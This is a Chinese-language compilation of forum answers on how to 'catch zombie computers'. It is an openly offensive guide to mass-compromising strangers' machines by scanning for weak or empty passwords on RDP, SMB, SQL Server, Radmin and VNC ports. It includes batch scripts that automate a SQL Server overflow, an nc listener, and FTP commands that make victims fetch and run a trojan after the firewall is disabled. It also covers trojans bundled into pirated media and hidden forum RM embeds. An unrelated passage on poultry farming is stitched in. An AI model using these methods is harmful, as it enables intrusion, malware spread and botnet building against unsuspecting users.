怎么抓肉鸡啊

下面我就教你怎么抓肉鸡

首先得准备一只免杀鸽子或者其他的远控，一个免费空间，一些工具（下面会提到）

1、扫3389端口抓肉鸡（适合新手）（抓不了国外肉鸡）

现在国内 *** 上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡。首先用端口扫描工具（如S扫）扫一段IP的3389端口，扫完后就直接用远程桌面连接开放3389的机器（也可以把结果保存为文本文件，用批量生成 3389连接的工具来连接），然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种 *** 只针XP系统，如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显，如果别人不是用new账号登入XP的，你再登入上去就会把他挤出去（XP只支持单用户登入，用户登入需要用工具开），或者电脑前有人你就不可能去打开IE下载木马了。

2、扫135端口抓肉鸡

首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用 recton开telnet传马。因为现在 135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。（详细动画可以去黑客网站搜索135）

3、扫445端口抓肉鸡

和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫。（详细动画可以去黑客网站搜索 445）

4、1433端口批量溢出抓肉鸡

这个 *** 可以实现全自动抓鸡，不过现在太多人搞，成功率已经不高了。

要用到的工具：S扫 sqlhello.exe nc.exe 批处理文件

首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件

@echo off

for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save

@echo off

for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556

还要新建一个tt.txt，里面你要扫的IP段，格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格

1433是要扫描的端口，1000是扫描线程数 ，do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP，556是后面NC监听的端口

然后再写个批处理

@echo off

Nc -l -vv -p 556daima.txt

echo usernamedaima.txt

echo passworddaima.txt

echo bindaima.txt(以2进制传输数据)

echo get xxx.exe(你的木马的文件名,要放在根目录下)daima.txt

echo byedaima.txt

net stop sharedaccess(关闭WINDOWS自带防火墙)

ftp -s:daima.txt

xxx.exe(也是填你木马的文件名)

del daima.txt

注意上面的代码回车符别删掉，要不然就没法下你的马了。

上面的步骤都搞好后，就可以开始扫肉鸡了。

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描，扫描完后自动溢出，溢出后还自动下马执行，爽吧！所以这里讲详细点，呵呵。还有42 21端口也可以这样溢出，只要用这些端口的溢出工具就好了，详细动画可以去黑客网站搜索1433。

忘了说，上面的工具和批处理什么的都要放在同一个文件夹下。

怎么抓鸡“？

“抓鸡”是黑客界的一种流行语言.这里所说的"鸡",是指"电脑肉鸡".

这就是指拥有管理权限的远程电脑。也就是受别人控制的远程电脑(傀儡电脑)。"肉鸡"可以是各种系统,如2003,2000,xp,win7,linux,unix等；更可以是一家公司\企业\学校甚至是 *** 军队的服务器

黑客们经常用80,135,445,1433,1521,3306,3389 之类的端口来抓鸡。

肉鸡一般被黑客以0.08、0.1元到30元不等价格出售。

说到肉鸡，就要讲到远程控制。远程控制软件例如灰鸽子、上兴、凤凰ABC、ghost、白金等等。

肉鸡不是吃的那种，是中了木马，或者留了后门，可以被远程操控的机器，现在许多人把有WEBSHELL 权限的机器也叫肉鸡。

谁都不希望自己的电脑被他人控制，但是很多人的电脑是几乎不设防的，很容易被远程攻击者完全控制。你的电脑就因此成为别人砧板上的肉，别人想怎么吃就怎么吃，肉鸡(机)一名由此而来。

通常情况下跟电脑 *** 连接的端口都存在有弱口令，这样就给黑客有可趁之机，通过工具扫描利用相应工具破解入侵这样你就成为黑客手中的“肉鸡”

他们这样的方式也就称之为“抓鸡”

什么是肉鸡,如何抓肉鸡

所谓肉鸡就是指专门用于生产鸡肉的仔鸡，它是食用肉仔鸡的总称。现代肉鸡的概念与传统肉鸡截然不同。50年代以前，传统肉鸡主要来源于淘汰的小公鸡和产蛋鸡，而现代肉鸡则是指通过专门化品系配套杂交生产的专门用于食肉的鸡。根据屠宰期和体重大小的不同，一般分为肉用仔鸡、炸用仔鸡和烤用仔鸡。肉用仔鸡一般2千克左右屠宰，炸用仔鸡较大一些，烤用仔鸡则更大。现在各国生产的肉鸡都以肉仔鸡为主。东、西方各国由于消费习惯和烹调方式的不同，肉仔鸡出售的体重和日龄也有所不同。美国所说的肉用仔鸡，大部分为6～7周龄，体重在1.90～2.25千克出售的肉鸡。在加工鸡肉产品中，作1/2或1/4分割的约占50%，加工成净肉的约有30%，加工白条、净膛和胴体的肉鸡约占20%，这些加工鸡肉产品中约有30%用作快餐。而北欧、东欧各国及荷兰生产的肉用仔鸡，大部分4～5周龄、体重在1.3～1.5千克出售，且多以整鸡或1/2或1/4分割后作烤鸡用。西班牙、意大利、法国等南欧各国生产的肉用仔鸡，一般在6～7周龄、体重1.8～2.2千克出售，多用于带骨烤或煮菜用。日本则很特殊，大部分肉鸡加工成净肉用，约占80%，带骨用的只占20%左右。在世界上肉鸡出售体重更大的，一般在1.9～2.7千克。这是因为鸡大，出肉率高，净肉成本低，且零售店欢迎腿肉和胸肉。日本生产的体重在1.1～1.5千克的小型肉用仔鸡，主要是供旅馆、饭店、菜馆等业务用，这种小型鸡一般养4～5周龄出售，数量约占总产量的20%左右。

我玩黑客,但不知道怎样抓肉鸡?

你这也算黑客 局网抓肉鸡三个工具, 1.超级网上邻居(用来搜索开放4778端口的电脑) 2.远程控制任我行(用来控制被搜到有4778端口的电脑,在该电脑内植入木马) 3.免杀灰鸽子 (生成服务器端,植入目标电脑) 具体操作自己自学!!!

没空说

另外 还有网页挂马 让上该网页的自动中招

怎么抓肉鸡IP?

抓肉鸡的11种 ***

首先得准备，免杀的STAT 或 一只免杀鸽子或者其他的远控，一个免费空间，一些工具（下面会提到）

（1）

扫3389端口抓肉鸡

（适合新手）（抓不了国外肉鸡）

现在国内 *** 上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡。首先用端口扫描工具（如S扫）扫一段IP的3389端口，扫完后就直接用远程桌面连接开放3389的机器（也可以把结果保存为文本文件，用批量生成3389连接的工具来连接），然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种 *** 只针XP系统，如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显，如果别人不是用new账号登入XP的，你再登入上去就会把他挤出去（XP只支持单用户登入，用户登入需要用工具开），或者电脑前有人你就不可能去打开IE下载木马了。

（2）

扫135端口抓肉鸡

首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。（详细动画可以去黑客网站搜索135）

（3）

扫445端口抓肉鸡

和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫。（详细动画可以去黑客网站搜索445）

（4）

1433端口批量溢出抓肉鸡

这个 *** 可以实现全自动抓鸡

要用到的工具：S扫 sqlhello.exe nc.exe批处理文件

首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件

@echo off

for /f \"eol=; tokens=1,2 delims= \" %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save

@echo off

for /f \"eol=; tokens=1 delims= \" %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556

还要新建一个tt.txt，里面你要扫的IP段，格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格

1433是要扫描的端口，1000是扫描线程数 ，do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP，556是后面NC监听的端口

然后再写个批处理

@echo off

Nc -l -vv -p 556nc.txt%0 这里的556要和上面的保持一致，你也可以改成其他的值，但是2处都要改，然后保存为nc.bat

然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载你木马的代码。

这里给出一种代码

echo open X.X.X.X(你FTP的IP)daima.txt

echo usernamedaima.txt

echo passworddaima.txt

echo bindaima.txt(以2进制传输数据)

echo get xxx.exe(你的木马的文件名,要放在根目录下)daima.txt

echo byedaima.txt

net stop sharedaccess(关闭WINDOWS自带防火墙)

ftp -s:daima.txt

xxx.exe(也是填你木马的文件名)

del daima.txt

注意上面的代码回车符别删掉，要不然就没法下你的马了。

上面的步骤都搞好后，就可以开始扫肉鸡了。

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描，扫描完后自动溢出，溢出后还自动下马执行，爽吧！所以这里讲详细点，呵呵。还有42 21端口也可以这样溢出，只要用这些端口的溢出工具就好了，详细动画可以去黑客网站搜索1433。

忘了说，上面的工具和批处理什么的都要放在同一个文件夹下。

先休息一下，打这么多字累死了

继续

（5）

扫1433抓肉鸡之 *** 2

要用到的工具：端口扫描器 X-scanSQL综合利用工具

上面我们说过了，1433溢出现在成功率已经不高了，所以我们可以用另一种 *** 。

开了1433端口的机器一般都装了SQL，所以我们可以猜测SQL弱口令来抓1433肉鸡。

首先先用端口扫描器扫一段IP的1433端口，然后结果保存为文本文件，接着用X-scan导入这些开了1433的IP，然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了，其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏，只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告，列出了有弱口令的机器，然后打开SQL综合利用工具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-利用目录，上传你的木马，然后在用DOS命令执行你的木马就OK了。

（6）

用WINNTAutoAttack扫SA弱口令抓肉鸡

工具：WINNTAutoAttack SQL综合利用工具

打开WINNTAutoAttack，找一段IP添上，然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号，接着开始扫描，扫完后，用 SQL综合利用工具连上传马执行就好了。

（7）

扫4899空口令抓肉鸡

工具：端口扫描器 4899探测器 Radmin

首先先用端口扫描器扫一段IP的4899端口，然后用4899探测器导入开了4899端口的IP，接着扫空令，最后用Radmin连接有空口令的机器，带开文件管理，上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899

（8）

扫5900端口抓VNC肉鸡

工具：VNC扫描器 VNC连接器

首先用VNC扫描器扫描一段IP，扫描格式为vscan.exe（扫描器文件名） -i 219.0.0.0-219.255.255.255（扫描IP段） -p 5900 -vnc -vv

扫描完成后会在扫描器所在的同一文件夹生成一个文本文件，打开后有一列IP，IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接，下面就不用多说了吧？ 详细动画可以去黑客网站搜索VNC

接下来说说挂马抓肉 *** 。 *** 有很多，比如 *** 挂马、免费空间挂马、迅雷挂马等等，有些我也还不会，呵呵。下面就介绍几种我会的。

（9）

*** 挂马

顾名思义，就是把你的木马发布到 *** 网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好，而且现在一般的 *** 网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起，再压缩成RAR文件发布，谁在开始下载时会知道RAR里有木马呢？当他费了好大劲下载完，打开发现是EXE的格式后，总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧？尤其是下XXX片的时候当然你也可以做个网页木马，然后把你网页木马的地址插入到你发布的文件中（不是所有文件都可以这样的，我只知道RM和EXE文件可以插入），别人下载打开后同时也会带开你的网页木马，如果他的系统没有补供你网页木马所利用的漏洞的话，那他就会中你的马了。有些朋友可能会想，我把木马和其他文件捆绑后格式保持为那个文件（比如RM捆绑木马后保持RM格式），那样别人不就不会怀疑了吗？呵呵，如果真有这样的好事那我上面何不说把木马和 *** 种子文件绑在一起发布，那样你肉鸡不抓疯了才怪~~所以在这里说一下，木马和其他文件捆绑后生成的文件只能为EXE格式的，除非你有你所捆绑文件的格式的溢出漏洞，那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少，大多都被补了，就算有别人也不一定会公开，为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞，针对winrar3.6版本以下的所有版本，只要你winrar版本低于3.6，运行绑了牧马的RAR文件后就会中马。此类木马症状为：运行RAR文件后会弹出一个什么什么损坏还是错误的对话框，然后RAR文件体积变小，减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常，不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本，小心中马哈。

（10）

免费空间挂马

其实和 *** 差不多，就是把做好的木马上传到你申请的免费空间，然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像 *** 那样做种子，那样不仅要开着电脑，还影响网速。我这几天就是这样挂的，弄个免费空间，上传个木马，到2个XXX论坛发个帖子，每天睡前一顶，才挂了几天，现在每天肉鸡都保持在40-60只。而且大部分都是美国的

（11）

用RM在论坛挂马

首先你弄个只有几秒钟的RM文件，然后插入你的网页木马，接着上传到你的空间，然后到一些支持插入RM连接的论坛发帖子，点插入real media 播放器，输入你的RM牧马地址，然后高度宽度都设为1（这部是为了保证隐蔽性 ），然后点发贴，这样别人在浏览你的帖子就会运行你的RM木马，而我们前面把高和宽设为1，在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了 好像FLASH木马也可以这样的，我没试过，大家可以去研究下。

黑客怎么捉肉鸡的，国外的都有

用远控生成小马，再通过，抓鸡工具扫描IP段。扫取肉鸡。最简单的 *** 。